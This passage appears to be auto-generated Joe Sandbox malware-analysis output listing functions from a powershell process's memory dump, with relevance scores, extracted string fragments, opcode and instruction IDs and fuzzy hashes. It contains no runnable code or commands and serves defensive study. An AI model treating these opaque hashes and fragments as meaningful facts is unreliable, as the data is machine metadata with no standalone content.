                                          • API String ID: 0-2309685269
                                          • Opcode ID: 2e17ddc8079ad625a3280f77af7e24f9d192b228ab33241166681072a2caa13c
                                          • Instruction ID: c7df1f1cce44726c0ac8a1d1bba8011c1b54330e29b9dce4b07f0a56bd563785
                                          • Opcode Fuzzy Hash: 2e17ddc8079ad625a3280f77af7e24f9d192b228ab33241166681072a2caa13c
                                          • Instruction Fuzzy Hash: 33B168B1B002469FCB65AF6885406AABBE2FFC9710F14846AD8318B245DB32DD01CBA1
                                          Function 07A84D16 Relevance: 6.4, Strings: 5, Instructions: 119COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$tP]q$$]q$$]q$$]q
                                          • API String ID: 0-2702571027
                                          • Opcode ID: a3e95600be2f9fd43f1874a3c16a21b2937d32fb4773f2d5c2740b5f909bb0e1
                                          • Instruction ID: 028457b2dfbcf90976fae453a3aafb92fe16b41595c9419017ae9acedf88285a
                                          • Opcode Fuzzy Hash: a3e95600be2f9fd43f1874a3c16a21b2937d32fb4773f2d5c2740b5f909bb0e1
                                          • Instruction Fuzzy Hash: 8E41D3B1A05287EBDBA5AF14C540BA5BBF1AF89710F1484ABD8355B291CB31D940CB91
                                          Function 07A854C8 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$$]q$$]q$$]q$$]q
                                          • API String ID: 0-2705583504
                                          • Opcode ID: 71650cb1b534d7a819fea4983191886b590a5959fa6befab8aecae1fb65e5f78
                                          • Instruction ID: 8d983c5def55392601d8db46e5d7d76c0ca9e8b36aa4f410f8a1f75e35214d3c
                                          • Opcode Fuzzy Hash: 71650cb1b534d7a819fea4983191886b590a5959fa6befab8aecae1fb65e5f78
                                          • Instruction Fuzzy Hash: EA218EF1E20206DBDBBC6F0AC58062577B7AF81B61F584666FC248A150C775C9A4CB51
                                          Function 07A800F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $]q$$]q$$]q$vl$vl
                                          • API String ID: 0-380406093
                                          • Opcode ID: 442811d7308ad12c994aec54542cf343a296889ab2c2c9db33cf34806176a4d9
                                          • Instruction ID: 0ba34e6523b87ce855f7652ad811b04895eff5dee3cbd28fcf0f4cb7bd15f829
                                          • Opcode Fuzzy Hash: 442811d7308ad12c994aec54542cf343a296889ab2c2c9db33cf34806176a4d9
                                          • Instruction Fuzzy Hash: 8D110B713043069BEBB46A1E9C40B27B7ABBFC1771F24842AE869C7351EA35C449C351
                                          Function 07A8BB68 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (o]q$(o]q$(o]q$(o]q
                                          • API String ID: 0-1261621458
                                          • Opcode ID: 11fd1491938cedd7142e50d36cf0749c3555f2c48e46959817a0312dca8f91c4
                                          • Instruction ID: 3dd1df5e7cf61cd9c4eea4ac9d45391d705294104fd081dad661374a21c7df7e
                                          • Opcode Fuzzy Hash: 11fd1491938cedd7142e50d36cf0749c3555f2c48e46959817a0312dca8f91c4
                                          • Instruction Fuzzy Hash: E7F136F1704306DFCB64AF68C8547AABBB2EFC6311F1484AAE5258B291DB31D845CB71
                                          Function 07A857B0 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $]q$$]q$$]q$$]q
                                          • API String ID: 0-858218434
                                          • Opcode ID: dccf2a431791e4798940c300bf660f71ba6e00fda88284ca3686a27148fef209
                                          • Instruction ID: ba399637b73bcf76f7ec0e0ff59c29e0c6f62392a89abb293ef95785a97578e9
                                          • Opcode Fuzzy Hash: dccf2a431791e4798940c300bf660f71ba6e00fda88284ca3686a27148fef209
                                          • Instruction Fuzzy Hash: A831A9B1B403026BEB646A3D4D40B3A769B8FC0B01F14882ADE11CF3C1DE76CC059365
                                          Function 07A86450 Relevance: 5.1, Strings: 4, Instructions: 98COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 84~l$84~l$tP]q$tP]q
                                          • API String ID: 0-1199993865
                                          • Opcode ID: 711a80138b10ddf866cd604becebcc6993cfa696e1b98bd4dfcb750ccdb204b5
                                          • Instruction ID: 1d26bd498660195dca5783e855f3af42b92fae0c49c8e7bc9fbf2072465f61ac
                                          • Opcode Fuzzy Hash: 711a80138b10ddf866cd604becebcc6993cfa696e1b98bd4dfcb750ccdb204b5
                                          • Instruction Fuzzy Hash: C53138B0A043549FC725AB68995066ABFF1EF8A710F19889AD990DF3A2C731DC04C7A1
                                          Function 07A80CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $]q$$]q$$]q$$]q
                                          • API String ID: 0-858218434
                                          • Opcode ID: 52aa9855634e17d42889a77c92d9c75437e645cec0f4b5b638d4b92d58c2af62
                                          • Instruction ID: 0d58ace5e9ff82314561b554d8ae43f8dd41be26492b5dfd7da4399d1f2ff450
                                          • Opcode Fuzzy Hash: 52aa9855634e17d42889a77c92d9c75437e645cec0f4b5b638d4b92d58c2af62
                                          • Instruction Fuzzy Hash: D9217BF13103065FDBB86A3E9840B33BBEAAFC1711F24882AD955CB381DD76D8498361
                                          Function 07A817A2 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$$]q$$]q
                                          • API String ID: 0-978391646
                                          • Opcode ID: 1098594b65e56eae4188ad02eca0e464f87c819f41a0b709da2bcf4fa812c011
                                          • Instruction ID: 90ebc0a9b680e319515084e52725ff71a36e05ff98c3273b317bbc269465973c
                                          • Opcode Fuzzy Hash: 1098594b65e56eae4188ad02eca0e464f87c819f41a0b709da2bcf4fa812c011
                                          • Instruction Fuzzy Hash: 0601A261B0E3894FC33A276859211656FB69FC391171A049BD0D1CF3A2CE684C07C3B7